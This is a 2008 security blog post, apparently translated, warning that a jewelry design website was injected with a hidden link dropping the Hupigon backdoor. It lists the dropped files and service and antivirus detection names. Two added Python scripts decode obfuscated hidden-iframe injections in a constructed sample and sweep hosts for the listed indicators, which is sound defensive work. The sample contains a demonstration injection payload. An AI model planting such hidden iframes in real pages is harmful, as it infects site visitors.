The 李玟箖 jewelry design website has been injected with a malicious link

12 February 2008 – 17:20:00

The 李玟箖 jewelry design website has been injected with a malicious link; the malware involved is BKDR_HUPIGON.FVR. Anyone who has browsed this site recently should check their computer as soon as possible, and please avoid visiting the site for the time being so as not to get infected. (Credit: an anonymous reader)

When you enter the site and click through to Blog or 飾品 (Accessories), you are redirected to a Yahoo blog (shown in the figure below). That blog currently has no malicious link injected, although the trace of an empty iframe remains:

The malicious link/code is placed in the home page (the other pages may need careful checking as well):

After decoding, the malicious link is as follows:
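The decoded link itself appears only in the post's screenshot. The script below is an added example, not code from the original post: it performs the decoding step for the injection style that was common at the time, an obfuscated `<script>` block that calls `unescape()` on a percent-encoded string and `document.write()`s a zero-size iframe, and it also flags empty or hidden iframes like the one left behind on the Yahoo blog. That this site's injection took exactly that form is an assumption; the only hint in the post is the percent-encoded cache file name `%73%79%73%2E%68%74%6D[1].htm` listed further down, which decodes to `sys.htm`. The sample page, the host `example.invalid` and the path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not the real site): a visible page body, an empty
# zero-size iframe such as the one left behind on the Yahoo blog, and an
# obfuscated script that writes a second hidden iframe. The host
# example.invalid and the path /sys.htm are assumptions for illustration.
SAMPLE_HTML = """<html><body>
<h1>Accessories</h1>
<iframe src="" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2F%73%79%73%2E%68%74%6D%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E"))</script>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)


def decode_percent(s):
    """Mimic JavaScript unescape(): %uXXXX gives one UTF-16 code unit, %XX one
    byte. Applied repeatedly because droppers sometimes nest the encoding."""
    while True:
        decoded = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        decoded = unquote(decoded)
        if decoded == s:
            return decoded
        s = decoded


def attr(tag, name):
    """Return the value of attribute `name` in an HTML start tag, or None."""
    pattern = r"\b" + re.escape(name) + r"""\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))"""
    m = re.search(pattern, tag, re.IGNORECASE)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def is_hidden(tag):
    """A 0x0 or display:none/visibility:hidden iframe is invisible to the
    visitor; drive-by injections use it to load the exploit page silently."""
    style = (attr(tag, "style") or "").replace(" ", "").lower()
    return (attr(tag, "width") == "0" or attr(tag, "height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


def scan(html):
    """Return (kind, detail) findings: hidden iframes in the page, the decoded
    text of every unescape() call, and hidden iframes inside that text."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        if is_hidden(tag):
            findings.append(("hidden_iframe", attr(tag, "src") or ""))
    for _quote, encoded in UNESCAPE_RE.findall(html):
        decoded = decode_percent(encoded)
        findings.append(("decoded_script", decoded))
        for tag in IFRAME_RE.findall(decoded):
            if is_hidden(tag):
                findings.append(("hidden_iframe", attr(tag, "src") or ""))
    return findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_HTML):
        print(kind, detail)
```

Run against a saved copy of the page (never against the live site from an unprotected machine); anything reported as `decoded_script` is the text you would otherwise have to decode by hand, and a hidden iframe whose `src` is empty is the "trace" the post mentions on the Yahoo blog.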

For a demonstration video, see here (a high-resolution AVI file can be downloaded from here).

The results of a Google Search are as follows:

After execution, the following behavior is observed:

[Added process]
C:\Program Files\Internet Explorer\IEXPLORE.EXE (this is Microsoft's IE, but the malware makes use of it and keeps it hidden; this process also holds system.exe locked)

[Added service]
NAME: Windows security service
DISPLAY: Windows security service
FILE: C:\Program Files\systeminfo1\system.exe

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temp\g0ld.com
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\sv[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\accessory.com[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\last[2].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\%73%79%73%2E%68%74%6D[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\%73%79%73%2E%68%74%6D[2].htm
C:\jiji1.exe
C:\Program Files\systeminfo1\system.exe
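An added example, not from the original post: a sweep that matches a host's service list and file listing against the indicators above. Two details matter in practice. The Content.IE5 subfolder names (C13NVBMZ, Q08VKCK4, SEUIMLSE) are random per machine and the profile directory differs per user, so Temp and cache files are matched by decoded basename under any profile rather than by exact path. And IE appends a `[n]` duplicate marker and an extension when caching, which is why `%73%79%73%2E%68%74%6D[1].htm` is really `sys.htm`. The observed paths and services below are constructed input for the demonstration; in a real sweep they would come from `sc query`/`sc qc` and a file walk of the drive.

```python
import re
from urllib.parse import unquote

# Indicators copied from the post's [Added service] and [Added file] lists,
# lower-cased because NTFS paths are case-insensitive.
IOC_SERVICE_NAME = "windows security service"
IOC_SERVICE_BINARY = r"c:\program files\systeminfo1\system.exe"
IOC_ABSOLUTE_PATHS = {r"c:\jiji1.exe", r"c:\program files\systeminfo1\system.exe"}
# Files dropped into Temp or the IE cache. Their directory varies per user and
# per machine, so they are matched on the decoded basename, without IE's
# "[n]" duplicate marker and with or without the extension IE appended.
IOC_DROPPED_NAMES = {"g0ld.com", "sv.exe", "last.exe", "accessory.com", "sys.htm"}

# Any user profile; either Local Settings\Temp or an 8-character random
# Content.IE5 cache folder; then the file name. Input is lower-cased first.
DROP_DIR_RE = re.compile(
    r"^c:\\documents and settings\\[^\\]+\\local settings\\"
    r"(?:temp|temporary internet files\\content\.ie5\\[a-z0-9]{8})\\(?P<name>[^\\]+)$")


def name_candidates(raw_name):
    """'%73%79%73%2e%68%74%6d[1].htm' -> {'sys.htm.htm', 'sys.htm'}:
    percent-decode, drop the [n] marker, and also try without the last
    extension, since IE adds one when the URL has none it recognises."""
    name = re.sub(r"\[\d+\]", "", unquote(raw_name))
    stem, dot, _ext = name.rpartition(".")
    return {name, stem} if dot else {name}


def match_file(path):
    """Return the indicator a path matches, or None."""
    p = path.lower()
    if p in IOC_ABSOLUTE_PATHS:
        return p
    m = DROP_DIR_RE.match(p)
    if not m:
        return None
    hits = name_candidates(m.group("name")) & IOC_DROPPED_NAMES
    return min(hits) if hits else None


def match_service(name, binary_path):
    """Flag on the display name or on the binary path: a variant may change
    either one, but rarely both."""
    return name.lower() == IOC_SERVICE_NAME or binary_path.lower() == IOC_SERVICE_BINARY


def sweep(files, services):
    """files: iterable of paths; services: iterable of (name, binary_path)."""
    file_hits = []
    for f in files:
        ioc = match_file(f)
        if ioc:
            file_hits.append((f, ioc))
    return {"files": file_hits,
            "services": [(n, b) for n, b in services if match_service(n, b)]}


# Constructed observations: a different user profile and different random
# cache folders than the ones in the post, plus benign entries.
OBSERVED_FILES = [
    r"C:\Documents and Settings\alice\Local Settings\Temp\g0ld.com",
    r"C:\Documents and Settings\alice\Local Settings\Temporary Internet Files\Content.IE5\ZZ9PLURA\%73%79%73%2E%68%74%6D[3].htm",
    r"C:\Documents and Settings\alice\Local Settings\Temporary Internet Files\Content.IE5\8Q1KJ0AB\sv[1].exe",
    r"C:\Documents and Settings\alice\My Documents\sv[1].exe",  # outside the drop dirs: not flagged
    r"C:\Program Files\systeminfo1\system.exe",
    r"C:\WINDOWS\system32\notepad.exe",
]
OBSERVED_SERVICES = [
    ("Windows Security Service", r"C:\Program Files\systeminfo1\system.exe"),
    ("Themes", r"C:\WINDOWS\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for section, hits in sweep(OBSERVED_FILES, OBSERVED_SERVICES).items():
        for hit in hits:
            print(section, *hit)
```

A file named `sv[1].exe` outside Temp or the IE cache is deliberately not flagged by name alone, since `sv.exe` is too generic a name to condemn on its own; the absolute-path indicators and the service are the strong signals.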

As of now (2008/2/12 @ 14:39), the following antivirus products detect these malicious files (for reference only):

system.exe:
[ Trend ], "BKDR_HUPIGON.FVR"
%73%79%73%2E%68%74%6D[1].htm:
[ WebWasher ], "BlockReason.46 (suspicious)"
g0ld.com:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/sv.exe]:Trojan-Downloader.Win32.Agent.iph"
[ Sophos ], "[SfxArchiveData\sv.exe]:Mal/Behav-010"
[ Nod32 ], "[?CAB ?sv.exe]:a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ WebWasher ], "Trojan.Delphi.Downloader.Gen"
jiji1.exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/www.exe]:Backdoor.Win32.Hupigon.aubv"
[ McAfee ], "BackDoor-AWQ"
[ McAfee_Beta ], "BackDoor-AWQ"
[ Sophos ], "[SfxArchiveData\www.exe]:Mal/Behav-058"
[ Nod32 ], "[?CAB ?www.exe]:a variant of Win32/Hupigon trojan"
[ Fortinet ], "[www.exe]:W32/Hupigon.YQ!tr.bdr"
[ Norman ], "Trojan Hupigon.gen126.dropper"
[ Rising ], "[>>www.exe>>Aspack212r]:Backdoor.Gpigeon.GEN"
[ Ewido ], "[/www.exe]:Backdoor.Hupigon.awp, [/www.exe]:Backdoor.Hupigon.awp"
[ Grisoft ], "[\www.exe]:Trojan horse BackDoor.Small.52.BQ, Trojan horse BackDoor.Small.52.BQ"
[ quickheal ], "Win32.Backdoor.Hupigon.ngr3"
[ vba32 ], "BackDoor.Pigeon.6620"
[ WebWasher ], "Trojan.Backdoor.Hupigon.ami"
last[1].exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/www.exe]:Backdoor.Win32.Hupigon.aubv"
[ McAfee ], "BackDoor-AWQ"
[ McAfee_Beta ], "BackDoor-AWQ"
[ Sophos ], "[SfxArchiveData\www.exe]:Mal/Behav-058"
[ Nod32 ], "[?CAB ?www.exe]:a variant of Win32/Hupigon trojan"
[ Fortinet ], "[www.exe]:W32/Hupigon.YQ!tr.bdr"
[ Norman ], "Trojan Hupigon.gen126.dropper"
[ Rising ], "[>>www.exe>>Aspack212r]:Backdoor.Gpigeon.GEN"
[ Ewido ], "[/www.exe]:Backdoor.Hupigon.awp, [/www.exe]:Backdoor.Hupigon.awp"
[ Grisoft ], "[\www.exe]:Trojan horse BackDoor.Small.52.BQ, Trojan horse BackDoor.Small.52.BQ"
[ quickheal ], "Win32.Backdoor.Hupigon.ngr3"
[ vba32 ], "BackDoor.Pigeon.6620"
[ WebWasher ], "Trojan.Backdoor.Hupigon.ami"
sv[1].exe:
[ Alpha_Gen ], "Possible_TrojDAS"
[ Kaspersky ], "ARC:Rsrc-Package, ARC:[data0000.cab]:CAB, [data0000.cab/sv.exe]:Trojan-Downloader.Win32.Agent.iph"
[ Sophos ], "[SfxArchiveData\sv.exe]:Mal/Behav-010″
[ Nod32 ], "[?CAB ?sv.exe]:a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ WebWasher ], "Trojan.Delphi.Downloader.Gen"

"The 李玟箖 jewelry design website has been injected with a malicious link" currently has 2 responses

May I ask which codec is needed to play the video?
Thanks!

By Vincent on 13 February 2008 - 10:43:00

You can download the codec from the VMware website:
http://www.vmware.com/download/eula/moviedecoder_v55.html

By Roger on 14 February 2008 - 15:25:00
